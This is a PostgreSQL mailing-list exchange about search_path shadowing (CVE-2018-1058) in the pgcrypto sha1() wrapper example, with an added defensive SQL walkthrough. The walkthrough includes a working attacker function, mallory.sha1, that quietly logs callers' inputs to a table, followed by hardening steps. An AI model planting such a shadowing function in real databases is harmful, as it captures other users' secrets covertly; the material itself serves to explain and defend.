On Tuesday, August 17, 2021, PG Doc comments form <nore...@postgresql.org> wrote:
> The following documentation comment has been logged on the website:
>
> Page: https://www.postgresql.org/docs/13/pgcrypto.html
> Description:
>
> Hi,
> in "F.25.1.1. digest()" you suggest:
>
> CREATE OR REPLACE FUNCTION sha1(bytea) returns text AS $$
> SELECT encode(digest($1, 'sha1'), 'hex')
> $$ LANGUAGE SQL STRICT IMMUTABLE;
>
> While this is a great example, it may expose a database app to
> vulnerabilities if the attacker succeeds in overriding the function
> sha1(...) in the app's user context (schema)
> You should read this: https://wiki.postgresql.org/wiki/A_Guide_to_CVE-2018-1058%3A_Protect_Your_Search_Path

David J.
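The shadowing the comment warns about, and the hardened form the linked wiki page recommends, as an added example that is not part of the thread or of the pgcrypto documentation. It assumes pgcrypto was originally installed into public (where the documented wrapper also lives), a schema named crypto for the hardened layout, a legitimate caller role app, and an attacker role mallory who can create objects in some schema that precedes public in app's search_path; all of those names are assumptions.

```sql
-- Added example, not from the pgcrypto docs or this thread.
-- Assumed names: schema "crypto", roles "app" (caller) and "mallory" (attacker).
-- Assumed starting state: pgcrypto installed in public, wrapper in public.

-- 1. The documented wrapper. Nothing is schema-qualified, and a SQL-language
--    body is resolved against the *caller's* search_path on every call, so
--    both the wrapper itself and the digest()/encode() it relies on are
--    looked up by name at run time.
CREATE OR REPLACE FUNCTION public.sha1(bytea) RETURNS text AS $$
  SELECT encode(digest($1, 'sha1'), 'hex')
$$ LANGUAGE sql STRICT IMMUTABLE;

-- 2. Shadowing. A function with the identical signature in a schema that
--    sits earlier in the caller's search_path hides public.sha1 for any
--    unqualified call. The shadow runs with the caller's privileges, so the
--    attacker grants INSERT to everyone and quietly keeps the inputs.
CREATE SCHEMA mallory AUTHORIZATION mallory;
CREATE TABLE mallory.captured (input bytea, captured_at timestamptz DEFAULT now());
GRANT INSERT ON mallory.captured TO PUBLIC;
GRANT USAGE  ON SCHEMA mallory TO PUBLIC;

CREATE FUNCTION mallory.sha1(bytea) RETURNS text AS $$
  INSERT INTO mallory.captured (input) VALUES ($1);
  SELECT public.sha1($1)   -- pass the real digest back so nothing looks wrong
$$ LANGUAGE sql;

-- 3. Victim session (role app). SET is used here only to make the
--    resolution visible; in the real attack the caller's path already
--    contains a schema the attacker can write to.
SET search_path = mallory, public;
SELECT sha1('hunter2'::bytea);   -- resolves to mallory.sha1; input is captured

-- Check: list every function named sha1 and which one an unqualified call
-- would reach under the current search_path.
SELECT p.oid::regprocedure                    AS signature,
       n.nspname                              AS schema,
       pg_catalog.pg_function_is_visible(p.oid) AS reached_unqualified
FROM   pg_catalog.pg_proc      p
JOIN   pg_catalog.pg_namespace n ON n.oid = p.pronamespace
WHERE  p.proname = 'sha1';

-- 4. Hardened form, following the wiki's guidance: stop arbitrary users
--    creating in public, keep the extension and the wrapper in a schema
--    only its owner can write to, qualify every reference in the body, and
--    pin the function's own search_path so the body is never resolved
--    against the caller's. pg_temp goes last so temp objects cannot shadow.
REVOKE CREATE ON SCHEMA public FROM PUBLIC;
CREATE SCHEMA crypto;                              -- owned by the DBA, no CREATE grants
ALTER EXTENSION pgcrypto SET SCHEMA crypto;        -- or CREATE EXTENSION ... WITH SCHEMA crypto on a fresh install
GRANT USAGE ON SCHEMA crypto TO app;

CREATE OR REPLACE FUNCTION crypto.sha1(bytea) RETURNS text AS $$
  SELECT pg_catalog.encode(crypto.digest($1, 'sha1'), 'hex')
$$ LANGUAGE sql STRICT IMMUTABLE
   SET search_path = pg_catalog, pg_temp;

-- Callers qualify the call as well, so search_path cannot redirect it:
SELECT crypto.sha1('hunter2'::bytea);
```

Two caveats worth knowing before adopting the hardened form: a SQL-language function that carries a SET clause is no longer eligible for inlining into the calling query, so pinning search_path trades a little planner optimisation for the guarantee; and the pinned path means every object the body touches must be schema-qualified (here crypto.digest and pg_catalog.encode), which is exactly the point, since an unqualified name that still resolves is a name that can be shadowed.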